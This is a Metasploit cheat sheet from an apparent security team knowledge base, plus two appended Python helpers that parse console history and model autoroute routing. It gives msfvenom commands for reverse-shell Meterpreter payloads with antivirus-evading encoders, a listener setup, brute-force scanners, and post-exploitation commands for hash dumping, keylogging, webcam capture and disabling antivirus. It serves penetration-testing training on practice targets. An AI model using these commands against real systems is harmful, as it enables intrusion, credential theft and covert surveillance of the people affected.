<!DOCTYPE html>
<html lang="en-US">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
    <title>Metasploit Exploitation Framework | WgpSec Security Team Public Knowledge Base</title>
    <meta name="description" content="">
    <meta name="generator" content="VuePress 1.7.1">
    <link rel="icon" href="/assets/logo.svg">
    <script type="text/javascript" src="/assets/js/push.js"></script>
    <meta name="description" content="Dedicated to building an information security utopia">
    <meta name="referrer" content="never">
    <meta name="keywords" content="知识库,公开知识库,狼组,狼组安全团队知识库,knowledge">
    <link rel="stylesheet" href="/assets/css/0.styles.32ca519c.css">
  </head>
  <body>
    <div id="app" data-server-rendered="true"><div class="theme-container"><main class="page"> <div class="theme-antdocs-content content__default"><h1 id="基本介绍">Basic introduction <a href="#基本介绍"
class="header-anchor">#</a></h1> <h2 id="metasploit模块划分">Metasploit module categories <a href="#metasploit模块划分" class="header-anchor">#</a></h2> <p>MSF is the most popular penetration testing framework in the field; it is made up of the following modules:</p> <blockquote><p>Auxiliary modules (Auxiliary, scanners): scan host systems and look for exploitable vulnerabilities;</p> <p>Exploit modules (Exploits): select and configure an exploit module;</p> <p>Payload modules (Payloads): select and configure a payload module;</p> <p>Post-exploitation modules (Post): the various operations used during internal-network penetration;</p> <p>Encoder modules (Encoders): select an encoding technique to evade antivirus software (or other evasion methods);</p></blockquote> <p>Location of all modules: <code>/usr/share/metasploit-framework/modules/</code></p> <p><strong>Exploitation steps (Exploit)</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>search xxx		<span class="token comment">#search for a vulnerability</span>
use xxx			<span class="token comment">#select an exploit module</span>
show options	<span class="token comment">#view the configuration options</span>
<span class="token builtin class-name">set</span> payload		<span class="token comment">#configure the payload</span>
exploit			<span class="token comment">#launch the exploit</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br></div></div><h2 id="参数摘要">Parameter summary <a href="#参数摘要" class="header-anchor">#</a></h2> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>reload_all		<span class="token comment">#reload all modules from the module directories</span>
back	<span class="token comment">#go back: leave the current context (used to switch modules)</span>
info	<span class="token comment">#detailed information about the target and the module</span>
check	<span class="token comment">#check whether the target is affected by the selected vulnerability</span>

sessions		<span class="token comment">#session management</span>
sessions -l		<span class="token comment">#list all sessions</span>
sessions -K		<span class="token comment">#terminate all sessions</span>
sessions -i <span class="token function">id</span>	<span class="token comment">#interact with a given session</span>
sessions -v		<span class="token comment">#list sessions in verbose mode</span>
sessions -u		<span class="token comment">#upgrade a shell to a meterpreter session (supported on many platforms)</span>

show options	<span class="token comment">#show the available options</span>
	 auxiliary	<span class="token comment">#show all auxiliary modules</span>
	 exploits	<span class="token comment">#show all exploit modules</span>
	 payloads	<span class="token comment">#show all payloads</span>
	 targets	<span class="token comment">#show all available targets</span>
	 advanced	<span class="token comment">#show additional advanced options</span>
	 encoders	<span class="token comment">#show the list of available encoders</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br><span class="line-number">12</span><br><span class="line-number">13</span><br><span class="line-number">14</span><br><span class="line-number">15</span><br><span class="line-number">16</span><br><span class="line-number">17</span><br><span class="line-number">18</span><br><span class="line-number">19</span><br></div></div><h1 id="使用辅助模块-auxiliary">Using auxiliary modules (Auxiliary) <a href="#使用辅助模块-auxiliary" class="header-anchor">#</a></h1> <h3 id="端口扫描">Port scanning <a href="#端口扫描" class="header-anchor">#</a></h3> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>use auxiliary/scanner/portmap/portmap_amp
use auxiliary/scanner/portscan/ftpbounce
use auxiliary/scanner/portscan/tcp
use auxiliary/scanner/portscan/ack
use auxiliary/scanner/portscan/syn
use auxiliary/scanner/portscan/xmas
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br></div></div><h3 id="服务扫描">Service scanning <a href="#服务扫描" class="header-anchor">#</a></h3> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>auxiliary/scanner/ssh/ssh_login		<span class="token comment">#SSH brute force</span>
auxiliary/scanner/vnc/vnc_none_auth	<span class="token comment">#VNC no-authentication scan</span>
auxiliary/scanner/telnet/telnet_login	<span class="token comment">#Telnet brute force</span>
auxiliary/scanner/smb/smb_version	<span class="token comment">#SMB OS version scan</span>
auxiliary/scanner/smb/smb_enumusers	<span class="token comment">#SMB user enumeration</span>
auxiliary/scanner/smb/smb_login		<span class="token comment">#SMB weak-password login</span>
auxiliary/admin/smb/psexec_command	<span class="token comment">#log in over SMB and execute a command</span>

auxiliary/scanner/mssql/mssql_ping	<span class="token comment">#MSSQL host information scan</span>
auxiliary/admin/mssql/mssql_enum	<span class="token comment">#MSSQL enumeration</span>
auxiliary/scanner/mysql/mysql_login	<span class="token comment">#MySQL weak-password scan</span>
auxiliary/admin/mysql/mysql_enum	<span class="token comment">#MySQL enumeration</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br><span class="line-number">12</span><br></div></div><h1 id="攻击载荷和编码-payloads-encoders">Payloads and encoding (Payloads &amp;&amp; Encoders) <a href="#攻击载荷和编码-payloads-encoders" class="header-anchor">#</a></h1> <p><strong>MSF can generate and encode a payload in the following way</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>use windows/meterpreter_reverse_http

-E   force encoding
-e   name of the encoder module to use
-f   output file name (otherwise stdout)
-t   output format: raw,ruby,rb,perl,pl,c,java,dll,exe,elf,vbs,asp,war, etc.
-b   list of characters to avoid: <span class="token string">'<span class="token entity" title="\x00">\x00</span><span class="token entity" title="\xff">\xff</span>'</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br></div></div><p><strong>But I personally prefer to generate <code>shellcode</code> with <code>msfvenom</code> and then encode it for AV evasion.</strong></p> <p><strong>Windows</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>msfvenom -p windows/x64/meterpreter/reverse_tcp <span class="token assign-left variable">LHOST</span><span class="token operator">=</span>KALI_IP <span class="token assign-left variable">LPORT</span><span class="token operator">=</span>KALI_LISTEN_PORT -f exe <span class="token operator">&gt;</span> msf.exe

Option descriptions:
-p			the payload to use
-e 			encoder, e.g. x86/shikata_ga_nai
-i			iterations: the number of times the payload is encoded
-f			output file format: exe, dll, raw
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br></div></div><p><strong>Linux</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>msfvenom -p linux/x86/meterpreter/reverse_tcp <span class="token assign-left variable">LHOST</span><span class="token operator">=</span><span class="token number">10.1</span>.1.15 <span class="token assign-left variable">LPORT</span><span class="token operator">=</span><span class="token number">6666</span> -f elf <span class="token operator">&gt;</span> msf.elf
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><h1 id="监听反弹shell">Listening for the reverse shell <a href="#监听反弹shell" class="header-anchor">#</a></h1> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>msf5 <span class="token operator">&gt;</span> use exploit/multi/handler
msf5 exploit<span class="token punctuation">(</span>multi/handler<span class="token punctuation">)</span> <span class="token operator">&gt;</span> <span class="token builtin class-name">set</span> payload windows/meterpreter/reverse_tcp
msf5 exploit<span class="token punctuation">(</span>multi/handler<span class="token punctuation">)</span> <span class="token operator">&gt;</span> <span class="token builtin class-name">set</span> LHOST <span class="token number">10.1</span>.1.15
msf5 exploit<span class="token punctuation">(</span>multi/handler<span class="token punctuation">)</span> <span class="token operator">&gt;</span> <span class="token builtin class-name">set</span> LPORT <span class="token number">6666</span>
msf5 exploit<span class="token punctuation">(</span>multi/handler<span class="token punctuation">)</span> <span class="token operator">&gt;</span> run
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br></div></div><h1 id="meterpreter用例">Meterpreter usage <a href="#meterpreter用例" class="header-anchor">#</a></h1> <p>A freshly obtained <code>Meterpreter Shell</code> is extremely fragile, so it should be bound to a stable process on the target machine</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>getpid			<span class="token comment">#show the process ID of the current Meterpreter shell</span>
<span class="token function">ps</span>				<span class="token comment">#list the processes running on the target</span>
migrate <span class="token number">476</span>		<span class="token comment">#migrate the shell into the process with PID 476</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br></div></div><h2 id="命令摘要">Command summary <a href="#命令摘要" class="header-anchor">#</a></h2> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>pwd, ls, cd
getuid		<span class="token comment">#show the current user and privileges</span>
getsystem	<span class="token comment">#obtain SYSTEM privileges (must be run with local administrator privileges)</span>
hashdump	<span class="token comment">#dump password hashes</span>
sysinfo		<span class="token comment">#show system information</span>
idletime	<span class="token comment">#show how long the remote user has been idle</span>
route		<span class="token comment">#show the target machine's complete network (routing) configuration</span>
shell		<span class="token comment">#drop into the target's shell; exit returns to meterpreter</span>
background	<span class="token comment">#move meterpreter to the background</span>

upload ./1.txt c:<span class="token punctuation">\</span><span class="token punctuation">\</span><span class="token number">1</span>.txt		<span class="token comment">#upload a file</span>
download c:<span class="token punctuation">\</span><span class="token number">1</span>.txt ./			<span class="token comment">#download a file</span>
search -f *.txt -d c://			<span class="token comment">#search for files</span>

keyscan_start	<span class="token comment">#start the keystroke logger</span>
keyscan_stop	<span class="token comment">#stop the keystroke logger</span>
keyscan_dump	<span class="token comment">#dump the captured keystrokes</span>
screenshot		<span class="token comment">#take a screenshot</span>
webcam_list		<span class="token comment">#list webcams</span>
webcam_snap		<span class="token comment">#take a webcam photo</span>
webcam_stream	<span class="token comment">#stream webcam video</span>

<span class="token comment">#log in to the remote desktop from Kali Linux</span>
<span class="token function">sudo</span> rdesktop -f TARGET_IP

route <span class="token function">add</span> IP NETMASK    <span class="token comment">#add a route (run background first)</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br><span class="line-number">12</span><br><span class="line-number">13</span><br><span class="line-number">14</span><br><span class="line-number">15</span><br><span class="line-number">16</span><br><span class="line-number">17</span><br><span class="line-number">18</span><br><span class="line-number">19</span><br><span class="line-number">20</span><br><span class="line-number">21</span><br><span class="line-number">22</span><br><span class="line-number">23</span><br><span class="line-number">24</span><br><span class="line-number">25</span><br><span class="line-number">26</span><br></div></div><h1 id="后渗透模块-post">Post-exploitation modules (Post) <a href="#后渗透模块-post" class="header-anchor">#</a></h1> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>run post/windows/gather/checkvm		<span class="token comment">#check whether the target is a virtual machine</span>
run post/linux/gather/checkvm
run post/windows/manage/killav		<span class="token comment">#disable antivirus software</span>
run post/windows/manage/enable_rdp	<span class="token comment">#enable remote desktop on the target</span>
run post/windows/gather/enum_logged_on_users	<span class="token comment">#list currently logged-on users and recently logged-on users</span>
run post/windows/gather/enum_applications		<span class="token comment">#list installed applications</span>
run post/windows/gather/credentials/windows_autologin	<span class="token comment">#list the auto-logon user name and password</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br></div></div><p>Official MSF post-module reference: https://www.offensive-security.com/metasploit-unleashed/post-module-reference/</p> <h1 id="网络穿透">Network pivoting <a href="#网络穿透" class="header-anchor">#</a></h1> <p><strong>After obtaining the reverse shell, gather the target's network information</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>meterpreter <span class="token operator">&gt;</span> run get_local_subnets
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p><strong>Add routes with the <code>autoroute</code> module</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>meterpreter <span class="token operator">&gt;</span> run autoroute -s <span class="token number">10.0</span>.0.0/255.0.0.0
meterpreter <span class="token operator">&gt;</span> run autoroute -p		<span class="token comment">#print the routing table (the live sessions that routes were added through)</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div><p>Once the routes are added, go back up one level. The sessions that the routing rules were added through must be kept alive: if a session drops, its routing rules become invalid as well.</p> <p>After the routes are added, use the ms17_010 scanning script to scan the target's internal network.</p> <h1 id="msf靶机">MSF practice targets <a href="#msf靶机" class="header-anchor">#</a></h1> <p><strong>Metasploitable2:</strong></p> <p>Download: https://sourceforge.net/projects/metasploitable/</p> <p>Official tutorial: https://metasploit.help.rapid7.com/docs/metasploitable-2</p> <p><strong>Metasploitable3</strong>:</p> <p>Download: https://github.com/rapid7/metasploitable3/</p> <p>Video tutorial: https://www.youtube.com/playlist?list=PLZOToVAK85MpnjpcVtNMwmCxMZRFaY6mT</p></div> <footer class="page-edit"><!----> <div class="last-updated"><span class="prefix">Last updated:</span> <span class="time">12/18/2021, 12:46:42 PM</span></div></footer> </main> <!----></div><div class="global-ui"></div></div>
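<p>As an added example (not code from the original page or from the Metasploit project), the Python helper below shows what the <code>exploit/multi/handler</code> transcript and the <code>msfvenom</code> command lines above encode when they are recovered during an investigation: it replays <code>use</code>, <code>set</code>, <code>setg</code> and <code>back</code> as the parameter summary describes them and extracts the reverse-connection endpoint, so a defender can turn an operator's console history or resource script into network indicators. The sample lines are constructed from this page; the prompt format and the option-handling rules are assumptions about msfconsole, not its own code.</p>
<pre>
```python
"""Reconstruct Metasploit listener and implant settings from recovered command lines.

Assumed forensic helper (not part of Metasploit): feed it lines recovered from an
operator's console history or a resource (.rc) script and it returns the modules
that were actually launched, the datastore options they ran with, and the
reverse-connection endpoints (LHOST, LPORT) a defender can turn into indicators.
"""
import re
import shlex
from dataclasses import dataclass

# Constructed sample: the handler transcript from this page, preceded by a scan
# the operator backed out of and a global LHOST, plus one msfvenom line.
SAMPLE_CONSOLE = [
    "msf5 > use auxiliary/scanner/portscan/tcp",
    "msf5 auxiliary(scanner/portscan/tcp) > set RHOSTS 10.1.1.0/24",
    "msf5 auxiliary(scanner/portscan/tcp) > back",
    "msf5 > setg LHOST 10.1.1.15",
    "msf5 > use exploit/multi/handler",
    "msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp",
    "msf5 exploit(multi/handler) > set LPORT 6666",
    "msf5 exploit(multi/handler) > run",
]
SAMPLE_VENOM = ("msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.1.1.15 "
                "LPORT=6666 -e x86/shikata_ga_nai -i 3 -f elf > msf.elf")

# Matches "msf5 > " or "msf5 exploit(multi/handler) > " at the start of a line.
PROMPT_RE = re.compile(r"^\s*msf\d*(?:\s+\w+\([^)]*\))?\s*>\s*")


@dataclass
class ModuleRun:
    module: str
    options: dict


def strip_prompt(line):
    """Drop the console prompt so transcripts and .rc files parse the same way."""
    return PROMPT_RE.sub("", line).strip()


def parse_console(lines):
    """Replay use/set/setg/unset/back and record every run/exploit launch."""
    runs, module, local, globs = [], None, {}, {}
    for raw in lines:
        line = strip_prompt(raw)
        if not line or line.startswith("#"):
            continue
        try:
            argv = shlex.split(line)
        except ValueError:          # unbalanced quotes: nothing we can replay
            continue
        cmd = argv[0].lower()
        if cmd == "use" and len(argv) == 2:
            module, local = argv[1], {}        # 'use' opens a fresh module context
        elif cmd == "back":
            module, local = None, {}           # 'back' drops the module context
        elif cmd == "set" and len(argv) >= 3 and module is not None:
            local[argv[1].upper()] = " ".join(argv[2:])
        elif cmd == "setg" and len(argv) >= 3:
            globs[argv[1].upper()] = " ".join(argv[2:])   # globals outlive 'back'
        elif cmd == "unset" and len(argv) == 2:
            local.pop(argv[1].upper(), None)
        elif cmd in ("run", "exploit") and module is not None:
            runs.append(ModuleRun(module, {**globs, **local}))  # module value wins
    return runs


def reverse_endpoints(runs):
    """(LHOST, LPORT) pairs of launched handlers or reverse-connection payloads."""
    found = set()
    for run in runs:
        payload = run.options.get("PAYLOAD", "")
        listener = run.module == "exploit/multi/handler" or "reverse" in payload
        if listener and "LHOST" in run.options and "LPORT" in run.options:
            found.add((run.options["LHOST"], run.options["LPORT"]))
    return found


def parse_msfvenom(cmdline):
    """Pull payload, encoder settings, KEY=VALUE options and output path from msfvenom."""
    argv = shlex.split(cmdline)
    if not argv or argv[0] != "msfvenom":
        return None
    flags = {"-p": "payload", "-f": "format", "-e": "encoder", "-i": "iterations",
             "-o": "output", ">": "output"}          # '>' is the page's shell redirect
    info = {"payload": None, "format": None, "encoder": None, "iterations": None,
            "output": None, "options": {}}
    i = 1
    while len(argv) > i:
        tok = argv[i]
        if tok in flags and len(argv) > i + 1:
            info[flags[tok]] = argv[i + 1]
            i += 2
        else:
            if "=" in tok and not tok.startswith("-"):
                key, value = tok.split("=", 1)
                info["options"][key.upper()] = value
            i += 1
    return info


if __name__ == "__main__":
    runs = parse_console(SAMPLE_CONSOLE)
    for run in runs:
        print(run.module, run.options)
    print("listener endpoints:", reverse_endpoints(runs))
    print("implant settings:", parse_msfvenom(SAMPLE_VENOM))
```
</pre>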
    <script src="/assets/js/app.f7464420.js" defer></script><script src="/assets/js/2.26207483.js" defer></script><script src="/assets/js/68.c1db2a2b.js" defer></script>
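<p>As an added example (not part of the page or of Metasploit), this Python model of the <code>autoroute</code> routing table shows why the network pivoting section insists that the sessions the routes were added through stay alive: a route only carries traffic while its session is live, and among live routes the most specific subnet is chosen. The default mask for a bare network and the longest-prefix selection are assumptions about autoroute, not its code; the sample routes are constructed, starting from the page's <code>10.0.0.0/255.0.0.0</code>.</p>
<pre>
```python
"""Model the routing table that 'run autoroute -s SUBNET' builds in Metasploit.

Assumed helper, not Metasploit code: each route is a subnet tied to the
Meterpreter session it was added through, and a destination is reachable only
while that session is still alive, which is the page's warning that a dropped
session invalidates its routes.
"""
import ipaddress
from dataclasses import dataclass


@dataclass(frozen=True)
class Route:
    network: ipaddress.IPv4Network
    session: int          # id of the session that relays traffic for this subnet


def add_route(table, subnet_arg, session, netmask=None):
    """Replay 'run autoroute -s SUBNET [-n NETMASK]' issued from `session`.

    Accepts 'NET/MASK' (as on this page), 'NET/PREFIX', or a bare network with a
    separate netmask.  Assumption: a bare network with no mask is taken as /24.
    """
    if "/" not in subnet_arg:
        subnet_arg = f"{subnet_arg}/{netmask or 24}"
    net = ipaddress.ip_network(subnet_arg, strict=False)   # 10.0.0.0/255.0.0.0 is fine
    route = Route(net, session)
    if route not in table:                                 # re-adding is idempotent
        table.append(route)
    return table


def select_session(table, live_sessions, dst):
    """Session id that would relay a connection to dst, or None if unreachable.

    Routes whose session is gone are skipped; among the rest the most specific
    (longest prefix) subnet wins, as in ordinary IP routing (assumption).
    """
    addr = ipaddress.ip_address(dst)
    best = None
    for route in table:
        if route.session not in live_sessions or addr not in route.network:
            continue
        if best is None or route.network.prefixlen > best.network.prefixlen:
            best = route
    return None if best is None else best.session


def stale_routes(table, live_sessions):
    """Routes left behind by sessions that have died; they no longer carry traffic."""
    return [r for r in table if r.session not in live_sessions]


def format_table(table):
    """Render the table in the Subnet / Netmask / Gateway layout of 'autoroute -p'."""
    rows = ["Subnet".ljust(16) + "Netmask".ljust(16) + "Gateway"]
    for r in table:
        rows.append(str(r.network.network_address).ljust(16)
                    + str(r.network.netmask).ljust(16) + f"Session {r.session}")
    return "\n".join(rows)


if __name__ == "__main__":
    # Constructed scenario: the page's /8 route via session 1, plus a deeper
    # /16 reached through a second pivot, session 2.
    routes = []
    add_route(routes, "10.0.0.0/255.0.0.0", 1)
    add_route(routes, "10.10.0.0", 2, netmask="255.255.0.0")
    print(format_table(routes))
    print("10.10.5.7 via session", select_session(routes, {1, 2}, "10.10.5.7"))
    print("after session 2 drops, via session", select_session(routes, {1}, "10.10.5.7"))
    print("stale routes:", [str(r.network) for r in stale_routes(routes, {1})])
```
</pre>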
  </body>
</html>